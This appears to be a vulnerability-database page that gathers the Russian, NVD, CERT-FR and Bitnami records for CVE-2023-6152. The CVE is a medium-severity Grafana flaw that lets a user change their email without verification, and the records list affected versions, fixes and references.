"\u041d\u0430\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u043d\u0438\u0435 \u041e\u0421 \u0438 \u0442\u0438\u043f \u0430\u043f\u043f\u0430\u0440\u0430\u0442\u043d\u043e\u0439 \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u044b": "\u041e\u041e\u041e \u00ab\u0420\u0435\u0434 \u0421\u043e\u0444\u0442\u00bb \u0420\u0415\u0414 \u041e\u0421 7.3 (\u0437\u0430\u043f\u0438\u0441\u044c \u0432 \u0435\u0434\u0438\u043d\u043e\u043c \u0440\u0435\u0435\u0441\u0442\u0440\u0435 \u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u0438\u0445 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c \u21163751)",
"\u041d\u0430\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0431\u0430\u0437\u043e\u0432\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0432\u0435\u0431-\u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0430 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0434\u0430\u043d\u043d\u044b\u0445 Grafana, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u043d\u0430\u0440\u0443\u0448\u0438\u0442\u0435\u043b\u044e \u043e\u0431\u043e\u0439\u0442\u0438 \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0443 \u044d\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u043e\u0439 \u043f\u043e\u0447\u0442\u044b \u0438 \u043f\u043e\u043c\u0435\u0448\u0430\u0442\u044c \u0437\u0430\u043a\u043e\u043d\u043d\u044b\u043c \u0432\u043b\u0430\u0434\u0435\u043b\u044c\u0446\u0430\u043c \u044d\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u043e\u0439 \u043f\u043e\u0447\u0442\u044b \u0437\u0430\u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0438\u0440\u043e\u0432\u0430\u0442\u044c\u0441\u044f",
"\u041d\u0430\u043b\u0438\u0447\u0438\u0435 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430": "\u0421\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u0435\u0442 \u0432 \u043e\u0442\u043a\u0440\u044b\u0442\u043e\u043c \u0434\u043e\u0441\u0442\u0443\u043f\u0435",
"\u041e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u043e\u0448\u0438\u0431\u043a\u0438 CWE": "\u041d\u0435\u043f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u0430\u044f \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u0430\u0446\u0438\u044f (CWE-863)",
"\u041e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0431\u0430\u0437\u043e\u0432\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0432\u0435\u0431-\u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0430 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0434\u0430\u043d\u043d\u044b\u0445 Grafana \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043a\u0430\u043c\u0438 \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c\u0430 \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u0430\u0446\u0438\u0438 \u043f\u0440\u0438 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u043a\u0435 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u0430 verify_email_enabled. \u042d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u0442\u044c \u043d\u0430\u0440\u0443\u0448\u0438\u0442\u0435\u043b\u044e, \u0434\u0435\u0439\u0441\u0442\u0432\u0443\u044e\u0449\u0435\u043c\u0443 \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e, \u043e\u0431\u043e\u0439\u0442\u0438 \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0443 \u044d\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u043e\u0439 \u043f\u043e\u0447\u0442\u044b \u0438 \u043f\u043e\u043c\u0435\u0448\u0430\u0442\u044c \u0437\u0430\u043a\u043e\u043d\u043d\u044b\u043c \u0432\u043b\u0430\u0434\u0435\u043b\u044c\u0446\u0430\u043c \u044d\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u043e\u0439 \u043f\u043e\u0447\u0442\u044b \u0437\u0430\u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0438\u0440\u043e\u0432\u0430\u0442\u044c\u0441\u044f",
"\u041f\u043e\u0441\u043b\u0435\u0434\u0441\u0442\u0432\u0438\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": null,
"\u041f\u0440\u043e\u0447\u0430\u044f \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f": null,
"\u0421\u0432\u044f\u0437\u044c \u0441 \u0438\u043d\u0446\u0438\u0434\u0435\u043d\u0442\u0430\u043c\u0438 \u0418\u0411": "\u0414\u0430\u043d\u043d\u044b\u0435 \u0443\u0442\u043e\u0447\u043d\u044f\u044e\u0442\u0441\u044f",
"\u0421\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u041e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u0430",
"\u0421\u043f\u043e\u0441\u043e\u0431 \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f": "\u041e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0433\u043e \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u044f",
"\u0421\u043f\u043e\u0441\u043e\u0431 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438": "\u041d\u0430\u0440\u0443\u0448\u0435\u043d\u0438\u0435 \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u0430\u0446\u0438\u0438",
"\u0421\u0441\u044b\u043b\u043a\u0438 \u043d\u0430 \u0438\u0441\u0442\u043e\u0447\u043d\u0438\u043a\u0438": "https://grafana.com/blog/2024/02/14/grafana-security-release-medium-severity-security-fix-for-cve-2023-6152/\nhttps://grafana.com/security/security-advisories/cve-2023-6152/\nhttps://github.com/grafana/bugbounty/security/advisories/GHSA-3hv4-r2fm-h27f\nhttp://repo.red-soft.ru/redos/7.3c/x86_64/updates/",
"\u0421\u0442\u0430\u0442\u0443\u0441 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u041f\u043e\u0434\u0442\u0432\u0435\u0440\u0436\u0434\u0435\u043d\u0430 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u0434\u0438\u0442\u0435\u043b\u0435\u043c",
"\u0422\u0438\u043f \u041f\u041e": "\u041e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u0430\u044f \u0441\u0438\u0441\u0442\u0435\u043c\u0430, \u041f\u0440\u0438\u043a\u043b\u0430\u0434\u043d\u043e\u0435 \u041f\u041e \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c",
"\u0422\u0438\u043f \u043e\u0448\u0438\u0431\u043a\u0438 CWE": "CWE-863",
"\u0423\u0440\u043e\u0432\u0435\u043d\u044c \u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u0421\u0440\u0435\u0434\u043d\u0438\u0439 \u0443\u0440\u043e\u0432\u0435\u043d\u044c \u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 (\u0431\u0430\u0437\u043e\u0432\u0430\u044f \u043e\u0446\u0435\u043d\u043a\u0430 CVSS 2.0 \u0441\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 5,5)\n\u0421\u0440\u0435\u0434\u043d\u0438\u0439 \u0443\u0440\u043e\u0432\u0435\u043d\u044c \u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 (\u0431\u0430\u0437\u043e\u0432\u0430\u044f \u043e\u0446\u0435\u043d\u043a\u0430 CVSS 3.0 \u0441\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 5,4)"
}
FKIE_CVE-2023-6152
Vulnerability from fkie_nvd - Published: 2024-02-13 22:15 - Updated: 2025-02-15 01:15
Severity ?
5.4 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L
5.4 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L
5.4 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L
Summary
A user changing their email after signing up and verifying it can change it without verification in profile settings.
The configuration option "verify_email_enabled" will only validate email only on sign up.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F1B0912A-B5CC-42BE-93D4-0A501A0245FA",
"versionEndIncluding": "2.5.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:grafana:grafana:10.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "CB81DBAE-551A-41FD-BFB5-325C9E0BCA10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:grafana:grafana:10.1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "1A61A884-885C-4961-8263-682CC9EDBCE8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:grafana:grafana:10.2.0:*:*:*:*:*:*:*",
"matchCriteriaId": "EE8E4C18-557B-4CD0-9EE5-DC4B8D5F20BC",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:grafana:grafana:10.3.0:*:*:*:*:*:*:*",
"matchCriteriaId": "9F6206EA-DB68-4409-A694-74F47D6879D4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "A user changing their email after signing up and verifying it can change it without verification in profile settings.\n\nThe configuration option \"verify_email_enabled\" will only validate email only on sign up.\n\n"
},
{
"lang": "es",
"value": "Un usuario que cambia su correo electr\u00f3nico despu\u00e9s de registrarse y verificarlo puede cambiarlo sin verificaci\u00f3n en la configuraci\u00f3n del perfil. La opci\u00f3n de configuraci\u00f3n \"verify_email_enabled\" solo validar\u00e1 el correo electr\u00f3nico al registrarse."
}
],
"id": "CVE-2023-6152",
"lastModified": "2025-02-15T01:15:09.723",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.5,
"source": "security@grafana.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.5,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2024-02-13T22:15:45.430",
"references": [
{
"source": "security@grafana.com",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/grafana/bugbounty/security/advisories/GHSA-3hv4-r2fm-h27f"
},
{
"source": "security@grafana.com",
"tags": [
"Vendor Advisory"
],
"url": "https://grafana.com/security/security-advisories/cve-2023-6152/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/grafana/bugbounty/security/advisories/GHSA-3hv4-r2fm-h27f"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://grafana.com/security/security-advisories/cve-2023-6152/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://security.netapp.com/advisory/ntap-20250214-0008/"
}
],
"sourceIdentifier": "security@grafana.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-863"
}
],
"source": "security@grafana.com",
"type": "Secondary"
},
{
"description": [
{
"lang": "en",
"value": "CWE-863"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
CERTFR-2024-AVI-0132
Vulnerability from certfr_avis - Published: 2024-02-15 - Updated: 2024-02-15
Une vulnérabilité a été découverte dans Grafana. Elles permettent à un attaquant de provoquer un contournement de la politique de sécurité.
Solution
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
NoneImpacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| Grafana Labs | Grafana | Grafana versions antérieures à 9.5.16 | ||
| Grafana Labs | Grafana | Grafana versions 10.3.x antérieures à 10.3.3 | ||
| Grafana Labs | Grafana | Grafana versions 10.2.x antérieures à 10.2.4 | ||
| Grafana Labs | Grafana | Grafana versions 10.0.x antérieures à 10.0.11 | ||
| Grafana Labs | Grafana | Grafana versions 10.1.x antérieures à 10.1.7 |
References
| Title | Publication Time | Tags | |||
|---|---|---|---|---|---|
|
|||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "Grafana versions ant\u00e9rieures \u00e0 9.5.16",
"product": {
"name": "Grafana",
"vendor": {
"name": "Grafana Labs",
"scada": false
}
}
},
{
"description": "Grafana versions 10.3.x ant\u00e9rieures \u00e0 10.3.3",
"product": {
"name": "Grafana",
"vendor": {
"name": "Grafana Labs",
"scada": false
}
}
},
{
"description": "Grafana versions 10.2.x ant\u00e9rieures \u00e0 10.2.4",
"product": {
"name": "Grafana",
"vendor": {
"name": "Grafana Labs",
"scada": false
}
}
},
{
"description": "Grafana versions 10.0.x ant\u00e9rieures \u00e0 10.0.11",
"product": {
"name": "Grafana",
"vendor": {
"name": "Grafana Labs",
"scada": false
}
}
},
{
"description": "Grafana versions 10.1.x ant\u00e9rieures \u00e0 10.1.7",
"product": {
"name": "Grafana",
"vendor": {
"name": "Grafana Labs",
"scada": false
}
}
}
],
"affected_systems_content": null,
"content": "## Solution\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des\ncorrectifs (cf. section Documentation).\n",
"cves": [
{
"name": "CVE-2023-6152",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6152"
}
],
"initial_release_date": "2024-02-15T00:00:00",
"last_revision_date": "2024-02-15T00:00:00",
"links": [],
"reference": "CERTFR-2024-AVI-0132",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2024-02-15T00:00:00.000000"
}
],
"risks": [
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
}
],
"summary": "Une vuln\u00e9rabilit\u00e9 a \u00e9t\u00e9 d\u00e9couverte dans Grafana. Elles permettent \u00e0 un\nattaquant de provoquer un contournement de la politique de s\u00e9curit\u00e9.\n",
"title": "Vuln\u00e9rabilit\u00e9 dans Grafana",
"vendor_advisories": [
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Grafana du 14 f\u00e9vrier 2024",
"url": "https://grafana.com/blog/2024/02/14/grafana-security-release-medium-severity-security-fix-for-cve-2023-6152/"
}
]
}
bit-grafana-2023-6152
Vulnerability from bitnami_vulndb
Published
2024-03-12 08:24
Modified
2025-04-03 14:40
Summary
Details
A user changing their email after signing up and verifying it can change it without verification in profile settings.
The configuration option "verify_email_enabled" will only validate email only on sign up.
{
"affected": [
{
"package": {
"ecosystem": "Bitnami",
"name": "grafana",
"purl": "pkg:bitnami/grafana"
},
"ranges": [
{
"events": [
{
"introduced": "2.5.0"
},
{
"fixed": "9.5.16"
},
{
"introduced": "10.0.0"
},
{
"fixed": "10.0.11"
},
{
"introduced": "10.1.0"
},
{
"fixed": "10.1.7"
},
{
"introduced": "10.2.0"
},
{
"fixed": "10.2.4"
},
{
"introduced": "10.3.0"
},
{
"fixed": "10.3.3"
}
],
"type": "SEMVER"
}
],
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
"type": "CVSS_V3"
}
]
}
],
"aliases": [
"CVE-2023-6152"
],
"database_specific": {
"cpes": [
"cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*",
"cpe:2.3:a:grafana:grafana:*:*:*:*:enterprise:*:*:*",
"cpe:2.3:a:grafana:grafana:*:*:*:*:*:go:*:*"
],
"severity": "Medium"
},
"details": "A user changing their email after signing up and verifying it can change it without verification in profile settings.\n\nThe configuration option \"verify_email_enabled\" will only validate email only on sign up.",
"id": "BIT-grafana-2023-6152",
"modified": "2025-04-03T14:40:37.652Z",
"published": "2024-03-12T08:24:38.577Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/grafana/bugbounty/security/advisories/GHSA-3hv4-r2fm-h27f"
},
{
"type": "WEB",
"url": "https://grafana.com/security/security-advisories/cve-2023-6152/"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20250214-0008/"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6152"
}
],
"schema_version": "1.5.0"
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…